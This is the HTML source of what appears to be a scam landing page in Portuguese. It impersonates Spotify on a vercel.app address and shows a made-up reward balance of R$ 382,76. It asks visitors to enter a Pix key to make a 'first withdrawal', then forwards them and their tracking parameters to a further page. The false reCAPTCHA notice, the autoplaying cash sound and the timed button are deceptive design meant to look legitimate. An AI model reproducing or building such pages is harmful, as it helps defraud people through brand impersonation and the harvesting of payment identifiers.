<!DOCTYPE html><html lang="en"><head>

<script>
    function saveUTMs() {
        const params = new URLSearchParams(window.location.search);
        const utmParams = ['utm_source', 'utm_medium', 'utm_campaign', 'utm_content', 'utm_term'];

        utmParams.forEach(param => {
            const value = params.get(param);
            if (value) {
                localStorage.setItem(param, value);
            } else if (!localStorage.getItem(param)) {
                localStorage.setItem(param, 'null');
            }
        });

        const nome = params.get('nome');
        if (nome) {
            localStorage.setItem('nome', nome);
        }
    }

    function buildQueryString() {
        const utmParams = ['utm_source', 'utm_medium', 'utm_campaign', 'utm_content', 'utm_term'];
        const queryParams = [];

        const nome = localStorage.getItem('nome');
        if (nome) {
            queryParams.push(`nome=${encodeURIComponent(nome)}`);
        }

        utmParams.forEach(param => {
            const value = localStorage.getItem(param);
            if (value) {
                queryParams.push(`${param}=${encodeURIComponent(value)}`);
            }
        });

        return queryParams.join('&');
    }

    function redirecionar(proximaPagina) {
        const query = buildQueryString();
        window.location.href = `${proximaPagina}?${query}`;
    }

    saveUTMs();
</script>


<script>
    function saveUTMs() {
        const params = new URLSearchParams(window.location.search);
        const utmParams = ['utm_source', 'utm_medium', 'utm_campaign', 'utm_content', 'utm_term'];

        utmParams.forEach(param => {
            const value = params.get(param);
            if (value) {
                localStorage.setItem(param, value);
            } else if (!localStorage.getItem(param)) {
                localStorage.setItem(param, 'null');
            }
        });

        const nome = params.get('nome');
        if (nome) {
            localStorage.setItem('nome', nome);
        }
    }

    function buildQueryString() {
        const utmParams = ['utm_source', 'utm_medium', 'utm_campaign', 'utm_content', 'utm_term'];
        const queryParams = [];

        const nome = localStorage.getItem('nome');
        if (nome) {
            queryParams.push(`nome=${encodeURIComponent(nome)}`);
        }

        utmParams.forEach(param => {
            const value = localStorage.getItem(param);
            if (value) {
                queryParams.push(`${param}=${encodeURIComponent(value)}`);
            }
        });

        return queryParams.join('&');
    }

    function redirecionar(proximaPagina) {
        const query = buildQueryString();
        window.location.href = `${proximaPagina}?${query}`;
    }

    saveUTMs();
</script>

    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Spotify</title>

    <!-- FONT GOOGLE POPPINS -->
    <link rel="preconnect" href="https://fonts.googleapis.com">
    <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin="">
    <link href="https://fonts.googleapis.com/css2?family=Poppins:ital,wght@0,100;0,200;0,300;0,400;0,500;0,600;0,700;0,800;0,900;1,100;1,200;1,300;1,400;1,500;1,600;1,700;1,800;1,900&display=swap" rel="stylesheet">

    <style>
        body, html {
            height: 100%;
            margin: 0;
            padding: 0;
            justify-content: space-around;
            display: flex;
            flex-direction: column;
            background-color: rgb(24, 24, 24);
            align-items: center;    /* Centraliza verticalmente */
          }
          .centralizado {
            margin-top: 70px;
            width: 300px;
            background-color: rgb(0, 0, 0);
            text-align: center;
            padding: 20px;
            display: flex;
            flex-direction: column;
            justify-content: space-between;
            align-items: center;
            border-radius: 10px;
          }
          *{
            font-family: "Poppins", sans-serif;
            color: white;
            padding: 0px;
          }
          #logocentral{
            width: 90px;
          }
          #textoprincipalsptfy{
            font-size: 23px;
            margin: 20px 0px;
            font-weight: 700;
          }
          #descricaoiniciospotify{
            color: rgb(168, 168, 168);
            margin-top: -10px;
            margin-bottom: -10px;
            font-size: 14px;
          }
          #descricaoiniciospotifyy{
            color: rgb(168, 168, 168);
            font-size: 14px;
            font-weight: 500;
          }
          #divisorlinha{
            width: 95%;
            height: 1px;
            background-color: rgb(105, 105, 105);
          }
          #txtinputmeil{
            color: rgb(168, 168, 168);
          }
          #logincadastro{
            display: flex;
            font-size: 15px;
            width: 100%;
            flex-direction: column;
            text-align: left;
          }
          #inputcadastro, #nomeInput{
            padding: 13px 10px;
            color: rgb(168, 168, 168);
            border-radius: 5px;
            margin-top: 5px;
            width: 100%;
            border: 1px solid rgb(168, 168, 168);
            background-color: rgb(24, 24, 24);
          }
          #meuBotao{
            padding: 13px 10px;
            background-color: gray;
            color: white;
            margin-top: 10px;
            border-radius: 50px;
            border: 1px solid gray;
            text-decoration: none;
            width: 90%;
            font-weight: 600;
          }

        /* Estilo após a mudança de cor */
        .verde {
            background-color: rgb(1, 214, 97);
            cursor: pointer; /* Muda o cursor para indicar que agora é clicável */
        }
          #topoFixo {
            position: fixed;
            top: 0; /* Define a posição no topo da página */
            left: 0; /* Alinha à esquerda */
            width: 100%; /* Faz a div ocupar toda a largura da página */
            background-color: #000000; /* Cor de fundo (verde) */
            color: white; /* Cor do texto */
            padding: 15px 10px;
            align-items: center;
            display: flex;
            justify-content: space-between;
            text-align: center; /* Centraliza o texto */
        }
        #logo{
            width: 130px;
        }
        #saldoatual{
            padding: 10px 15px;
            border-radius: 10px;
            margin-right: 20px;
            background-color: rgb(7, 187, 52);
        }
        #txtnotificacao{
            color: white;
        }
        #notificacao{
            background-color: rgba(1, 214, 97, 0.434);
            display: flex;
            margin-top: -10px;
            align-items: center;
            margin-bottom: 20px;
            text-align: center;
            font-size: 14px;
            justify-content: center;
            width: 100%;
            border-radius: 10px;
            border: 1px solid rgb(1, 214, 97);
        }
    </style>
</head>
<body>
    <!-- TOPO FIXO -->
    <div id="topoFixo">
        <img src="10/images/logo.png" id="logo">
        <div id="saldoatual">
            Saldo: R$ 382,76
        </div>
    </div>

    <div class="centralizado">
        <!-- IMAGEM DA LOGO -->
        <img src="images/logowhite.png" id="logocentral">

        <!-- TEXTO POP UP -->
        <div id="textoprincipalsptfy">
            Olá, <b id="mensagem">Visitante!</b>
        </div>
         
        <div id="notificacao">
           <p id="txtnotificacao">Você ganhou <b>R$ 31,59</b><br><br><b style="font-size: 25px;">SALDO: R$ 382,76</b></p>
        </div>

         <!-- DESCRICAO -->
          <p id="descricaoiniciospotify">
            Realize seu <b>PRIMEIRO SAQUE!</b>
          </p>

           <!-- SISTEMA DE AVALIACAO -->
            <style>
                #botaperguntas{
                    display: flex;
                    padding: 10px;
                    margin-top: -20px;
                    justify-content: space-between;
                }
                #opcao, #opcaoo, #opcaooo, #opcaoooo{
                    padding: 10px 17px;
                    border-radius: 10px;
                    width: 30%;
                    display: flex;
                    justify-content: center;
                    align-items: center;
                    flex-direction: column;
                    background-color: gray;
                    color: white;
                }
            </style>
            <div id="avalaiacao">
                <div id="perguntacompleta">
                    <p id="texytpergunta">Tipo chave Pix:</p>
                    <div id="botaperguntas">
                        <div id="opcao"><svg xmlns="http://www.w3.org/2000/svg" width="25" height="25" fill="currentColor" class="bi bi-person-fill" viewBox="0 0 16 16">
                            <path d="M3 14s-1 0-1-1 1-4 6-4 6 3 6 4-1 1-1 1zm5-6a3 3 0 1 0 0-6 3 3 0 0 0 0 6"></path>
                          </svg>CPF/<br>CNPJ</div>
                        <div id="opcaoo" style="margin-left: 10px;"><svg xmlns="http://www.w3.org/2000/svg" width="25" height="25" fill="currentColor" class="bi bi-envelope-at-fill" viewBox="0 0 16 16">
                            <path d="M2 2A2 2 0 0 0 .05 3.555L8 8.414l7.95-4.859A2 2 0 0 0 14 2zm-2 9.8V4.698l5.803 3.546zm6.761-2.97-6.57 4.026A2 2 0 0 0 2 14h6.256A4.5 4.5 0 0 1 8 12.5a4.49 4.49 0 0 1 1.606-3.446l-.367-.225L8 9.586zM16 9.671V4.697l-5.803 3.546.338.208A4.5 4.5 0 0 1 12.5 8c1.414 0 2.675.652 3.5 1.671"></path>
                            <path d="M15.834 12.244c0 1.168-.577 2.025-1.587 2.025-.503 0-1.002-.228-1.12-.648h-.043c-.118.416-.543.643-1.015.643-.77 0-1.259-.542-1.259-1.434v-.529c0-.844.481-1.4 1.26-1.4.585 0 .87.333.953.63h.03v-.568h.905v2.19c0 .272.18.42.411.42.315 0 .639-.415.639-1.39v-.118c0-1.277-.95-2.326-2.484-2.326h-.04c-1.582 0-2.64 1.067-2.64 2.724v.157c0 1.867 1.237 2.654 2.57 2.654h.045c.507 0 .935-.07 1.18-.18v.731c-.219.1-.643.175-1.237.175h-.044C10.438 16 9 14.82 9 12.646v-.214C9 10.36 10.421 9 12.485 9h.035c2.12 0 3.314 1.43 3.314 3.034zm-4.04.21v.227c0 .586.227.8.581.8.31 0 .564-.17.564-.743v-.367c0-.516-.275-.708-.572-.708-.346 0-.573.245-.573.791"></path>
                          </svg>E-MAIL</div>
                        <div id="opcaooo" style="margin-left: 10px;"><svg xmlns="http://www.w3.org/2000/svg" width="25" height="25" fill="currentColor" class="bi bi-dice-5-fill" viewBox="0 0 16 16">
                            <path d="M3 0a3 3 0 0 0-3 3v10a3 3 0 0 0 3 3h10a3 3 0 0 0 3-3V3a3 3 0 0 0-3-3zm2.5 4a1.5 1.5 0 1 1-3 0 1.5 1.5 0 0 1 3 0m8 0a1.5 1.5 0 1 1-3 0 1.5 1.5 0 0 1 3 0M12 13.5a1.5 1.5 0 1 1 0-3 1.5 1.5 0 0 1 0 3M5.5 12a1.5 1.5 0 1 1-3 0 1.5 1.5 0 0 1 3 0M8 9.5a1.5 1.5 0 1 1 0-3 1.5 1.5 0 0 1 0 3"></path>
                          </svg>ALEA-<br>TÓRIA</div>
                        <div id="opcaoooo" style="margin-left: 10px;"><svg xmlns="http://www.w3.org/2000/svg" width="25" height="25" fill="currentColor" class="bi bi-telephone-fill" viewBox="0 0 16 16">
                            <path fill-rule="evenodd" d="M1.885.511a1.745 1.745 0 0 1 2.61.163L6.29 2.98c.329.423.445.974.315 1.494l-.547 2.19a.68.68 0 0 0 .178.643l2.457 2.457a.68.68 0 0 0 .644.178l2.189-.547a1.75 1.75 0 0 1 1.494.315l2.306 1.794c.829.645.905 1.87.163 2.611l-1.034 1.034c-.74.74-1.846 1.065-2.877.702a18.6 18.6 0 0 1-7.01-4.42 18.6 18.6 0 0 1-4.42-7.009c-.362-1.03-.037-2.137.703-2.877z"></path>
                          </svg>TELL</div>
                    </div>
                </div>

                <script>
                    // Função para mudar a cor do botão ao clicar
                    document.getElementById('opcao').onclick = function() {
                        const botao = this; // Referência ao botão clicado
                        botao.style.backgroundColor = 'rgb(1, 214, 97)'; // Altera a cor do fundo para verde
                        botao.style.borderColor = 'rgb(1, 214, 97)'; // Altera a cor da borda para verde
                    };

                    // Função para mudar a cor do botão ao clicar
                    document.getElementById('opcaoo').onclick = function() {
                        const botao = this; // Referência ao botão clicado
                        botao.style.backgroundColor = 'rgb(1, 214, 97)'; // Altera a cor do fundo para verde
                        botao.style.borderColor = 'rgb(1, 214, 97)'; // Altera a cor da borda para verde
                    };

                    // Função para mudar a cor do botão ao clicar
                    document.getElementById('opcaooo').onclick = function() {
                        const botao = this; // Referência ao botão clicado
                        botao.style.backgroundColor = 'rgb(1, 214, 97)'; // Altera a cor do fundo para verde
                        botao.style.borderColor = 'rgb(1, 214, 97)'; // Altera a cor da borda para verde
                    };

                    // Função para mudar a cor do botão ao clicar
                    document.getElementById('opcaoooo').onclick = function() {
                        const botao = this; // Referência ao botão clicado
                        botao.style.backgroundColor = 'rgb(1, 214, 97)'; // Altera a cor do fundo para verde
                        botao.style.borderColor = 'rgb(1, 214, 97)'; // Altera a cor da borda para verde
                    };
                </script>
            </div>
            <audio id="slotSound" autoplay="">
              <source src="media/cash.mp3" type="audio/mpeg">
            </audio>


           <!-- DADOS DE LOGIN -->
           <input type="text" placeholder="Sua Chave Pix" id="nomeInput">

            <button onclick="redirecionar()" id="meuBotao" disabled="">PREENCHA AS INFORMAÇÕES</button>

            <script>
                // Função para mudar a cor do botão e da borda, além de habilitar o redirecionamento
                function mudarBotao() {
                    const botao = document.getElementById('meuBotao');
                    botao.style.backgroundColor = 'rgb(1, 214, 97)';  // Altera a cor do fundo diretamente
                    botao.style.borderColor = 'rgb(1, 214, 97)';  // Altera a cor da borda diretamente
                    botao.style.cursor = 'pointer';  // Muda o cursor para indicar que agora é clicável
                    botao.innerText = 'REALIZAR SAQUE!';  // Altera o texto do botão
                    botao.disabled = false;  // Habilita o botão para ser clicado

                    // Adiciona o redirecionamento ao clicar no botão
                    botao.onclick = function() { redirecionar("https://acessospoti.vercel.app/11"); }
</script>


<script>
    window.onload = function() {
        const nome = localStorage.getItem('nome');
        if (nome && nome !== 'null') {
            document.getElementById('mensagem').innerText = `${nome}!`;
        } else {
            document.getElementById('mensagem').innerText = 'Visitante!';
        }
    }
</script>

<script>
    function liberarBotao() {
        const botao = document.getElementById('meuBotao');
        botao.style.backgroundColor = 'rgb(1, 214, 97)';
        botao.style.borderColor = 'rgb(1, 214, 97)';
        botao.style.cursor = 'pointer';
        botao.innerText = 'Realizar Saque';
        botao.disabled = false;
        botao.classList.add('verde');

        botao.onclick = function() {
            redirecionar('https://acessospoti.vercel.app/11');
        }
    }
    setTimeout(liberarBotao, 10000);
</script>

<script>
    // Grupo 1
    const grupo1 = [document.getElementById('opcao'), document.getElementById('opcaoo')];
    grupo1.forEach(botao => {
        botao.addEventListener('click', () => {
            grupo1.forEach(b => {
                b.style.backgroundColor = 'gray';
                b.style.borderColor = 'gray';
            });
            botao.style.backgroundColor = 'rgb(1, 214, 97)';
            botao.style.borderColor = 'rgb(1, 214, 97)';
        });
    });

    // Grupo 2
    const grupo2 = [document.getElementById('opcaooo'), document.getElementById('opcaoooo')];
    grupo2.forEach(botao => {
        botao.addEventListener('click', () => {
            grupo2.forEach(b => {
                b.style.backgroundColor = 'gray';
                b.style.borderColor = 'gray';
            });
            botao.style.backgroundColor = 'rgb(1, 214, 97)';
            botao.style.borderColor = 'rgb(1, 214, 97)';
        });
    });
</script>
<p id="descricaoiniciospotifyy">
                Este site é protegido pelo reCAPTCHA e está sujeito à <b style="color: rgb(1, 214, 97); font-weight: 500;">Política de Privacidade</b> e aos <b style="color: rgb(1, 214, 97); font-weight: 500;">Termos de Serviço do Google.</b>
            </p>
      </div>

</div></body></html>
